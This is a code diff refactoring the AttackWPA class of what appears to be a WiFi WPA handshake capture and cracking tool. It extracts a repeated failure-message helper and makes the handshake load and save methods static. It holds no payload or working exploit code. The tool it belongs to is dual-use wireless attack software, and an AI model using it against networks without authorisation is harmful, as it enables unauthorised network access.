@@ -53,16 +53,14 @@ class AttackWPA(Attack):
 
         # Check for the --skip-crack flag
         if Configuration.skip_crack:
-            Color.pl('{+} Not cracking handshake because {C}skip-crack{W} was used{W}')
-            self.success = False
-            return False
-
+            return self._extracted_from_run_30(
+                '{+} Not cracking handshake because {C}skip-crack{W} was used{W}'
+            )
         # Check wordlist
         if Configuration.wordlist is None:
-            Color.pl('{!} {O}Not cracking handshake because wordlist ({R}--dict{O}) is not set')
-            self.success = False
-            return False
-
+            return self._extracted_from_run_30(
+                '{!} {O}Not cracking handshake because wordlist ({R}--dict{O}) is not set'
+            )
         elif not os.path.exists(Configuration.wordlist):
             Color.pl('{!} {O}Not cracking handshake because wordlist {R}%s{O} was not found' % Configuration.wordlist)
             self.success = False
@@ -84,6 +82,12 @@ class AttackWPA(Attack):
             self.success = True
         return self.success
 
+    # TODO Rename this here and in `run`
+    def _extracted_from_run_30(self, arg0):
+        Color.pl(arg0)
+        self.success = False
+        return False
+
     def capture_handshake(self):
         """Returns captured or stored handshake, otherwise None."""
         handshake = None
@@ -186,7 +190,8 @@ class AttackWPA(Attack):
 
         return handshake
 
-    def load_handshake(self, bssid, essid):
+    @staticmethod
+    def load_handshake(bssid, essid):
         if not os.path.exists(Configuration.wpa_handshake_dir):
             return None
 
@@ -205,7 +210,8 @@ class AttackWPA(Attack):
 
         return None
 
-    def save_handshake(self, handshake):
+    @staticmethod
+    def save_handshake(handshake):
         """
             Saves a copy of the handshake file to hs/
             Args:
